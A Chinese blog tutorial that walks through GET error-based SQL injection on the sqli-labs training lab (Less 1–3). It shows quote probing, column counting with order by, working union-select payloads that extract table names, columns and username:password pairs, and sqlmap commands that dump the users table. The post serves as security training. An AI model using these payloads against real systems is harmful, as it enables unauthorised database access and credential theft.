get基于报错的sql注入

最新推荐文章于 2024-04-19 17:02:43 发布
最新推荐文章于 2024-04-19 17:02:43 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: # sql注入 文章标签: 数据库 java sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66060262/article/details/125786900
版权

 目录

1.SQL注入的分类

数字型

字符型

2.get基于报错的sql注入发现

3.get基于报错的sql注入利用

1.利用order by 判断字段数。

2.利用union select 联合查询,获取表名。

3.利用union select联合查询,获取字段名。

4.利用union select 联合查询,获取字段值。

4.利用sqlmap测试

1.SQL注入的分类

根据注入为数据类型可将sql注入分为数字型和字符型。

数字型

例如

select *from table where id = 用户输入id

字符型

例如

select * from table where id = '用户输入id
'

2.get基于报错的sql注入发现

通过在url中修改对应的id值,为正常数字、打数字、字符(单引号、双引号、双单引号、括号)、反斜杠 \ 来探测url中是否存在注入点。

那么我们可以利用sqllilabs的less1到3题来看看 get基于报错的sql注入

然后我们输入5

 输入10

10也有,那我们输入15

 发现15没有,那我们输入14

发现,14有,

测这种有多少的方法很简单,可以按1,5,10,15这样叠加上去,如果遇到没有的,那就与上一个数取半来继续 ,

比如 输入10有,15没有,那就输入13,如果十三有可以试试14。

那么在14后门加个单引号

报错,存在注入点,好吧。

sql语句的话可以是

select login_name,password from admin where id = 'id' limit 0,1

 这个admin的表不一定是存在的,这里只是假设有这个表。

看看第二个

加上单引号一样报错,

sql语句为

select login_name,password from admin where id = id limit 0,1

 可以看出id加不加单引号括起来是看 limit0,1那里的,这就是字符串和数字类型了

看到第三题

发现有俩个单引号还有一个单括号,那么sql语句可以为

select login_name,password from admin where id =('id') limit 0,1

 然后试试

) --+

来闭合、注释,发现过了

 其实不用+号 加上%20也是可以的,也就是空格

3.get基于报错的sql注入利用

1.利用order by 判断字段数。

测试5和4时都报错,显示 Unknown column '4' in 'order clause' 发现3是对的,那么我们可以得出当前内容有三个字段,

2.利用union select 联合查询,获取表名。

0' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

然后

这里改成0,然后显示的是,用的是第二个字段的name,第三个字段的password。

那么我们可以改一下

 

一个显示它的版本,一个显示他的数据库 

那么我们就可以用上面的语句来测试,

3.利用union select联合查询,获取字段名。

0' union select 1, group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4.利用union select 联合查询,获取字段值。

0' union select 1, group_concat(username,0x3a,password),3 from users--+

那么这里就获取出来了当前数据库中所有的name和password。

4.利用sqlmap测试

用sqlmap对漏洞进行漏洞探测:

sqlmap -u 'http://192.168.0.105/sqli/Less-1/?id=1' --dbs --batch

可以看到这有七个数据库。然后我们要看看security这个数据库

┌──(root💀bt)-[~]
└─# sqlmap -u 'http://192.168.0.105/sqli/Less-1/?id=1' -D security --tables --batch

 

然后看users这个表

┌──(root💀bt)-[~]
└─# sqlmap -u 'http://192.168.0.105/sqli/Less-1/?id=1' -D security -T users --columns --batch

 

然后把它们显示出来

┌──(root💀bt)-[~]
└─# sqlmap -u 'http://192.168.0.105/sqli/Less-1/?id=1' -D security -T users -C 'username,password' --dump --batch

 

 搞完!

冷巷(✘_✘)
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入报错注入
qq_45557130的博客
10-07 531
sql注入报错注入
GET型sql注入教学
m0_67265441的博客
01-29 721
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列把数据都列出来。第六步:通过表查询列。第一步:判断页面真假值。
sql注入报错注入
weixin_45653478的博客
04-08 1050
报错注入的原理基于应用程序在处理数据库查询时产生的错误信息。当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。当它的第二个参数不是一个合法的XPath表达式时,会引发错误,并可能返回包含攻击者所需信息的错误消息。在报错注入中,攻击者可能会构造特定的SQL语句,利用floor()函数的特性来触发错误,并从中获取数据库信息。:这也是MySQL的一个XML函数,用于改变(查找并替换)XML文档中符合条件的节点的值。
SQL注入之GET型
qq_51393133的博客
09-11 690
每个数据库都有一个"table_schema"字段,存放的是该数据库字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的字。
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 587
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库" -T "表" -columns。
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1726
【实训04】数据库SQL注入漏洞
第六节 GET报错注入-01
09-15
第六节 GET报错注入-01
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
SQL报错注入
qq_64332865的博客
02-18 566
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库、版本号、用户等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 838
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
sql注入报错注入
最新发布
2302_79119987的博客
04-19 795
实行注入的地方。
get和post请求的sql盲注防护
木一番的博客
03-18 700
get和post请求的sql盲注防护 网上很多方案都只拦截了get请求,但是涉及到post请求的资料却很少。踩了一些坑,这里给大家分享一波,希望大家少踩坑吧,哪里有不妥的地方,欢迎各位斧正 只拦截get请求,post请求类型Content-Type为application/json的,否则,会被拦截,例如上传个图片是不行的,图片转码后,有太多的特殊敏感字符,会被sql拦截器拦住,导致上传失败。 SqlInjectFilter 由于实现filter只能处理一次post请求流,所以用到了包装类sqlIn
SQL注入的解决方案
交小新的博客
09-24 584
SQL注入的解决方案 //解决SQL注入攻击的方案 private static void login2() { try{ Class.forName("com.mysql.jdbc.Driver"); String url="jdbc:mysql:///cgb2104?characterEncoding=utf8"; Connection conn = DriverManager.getConnection(url, "root", "root");
SQL注入—基于报错注入
Snowflake1997的博客
02-18 1078
SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找.
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1164
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
SQL注入:基于报错SQL注入
weixin_73180072的博客
12-04 257
基于报错SQL注入
安鸾sql报错型注入02
07-25
对于安鸾SQL报错型注入02,报错注入是利用网站的报错信息来带出我们想要的信息。在报错注入中,我们可以使用一些常用的命令来测试平台和获取信息。其中,floor()+rand()+group()函数是一种常用的报错注入命令。另外...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值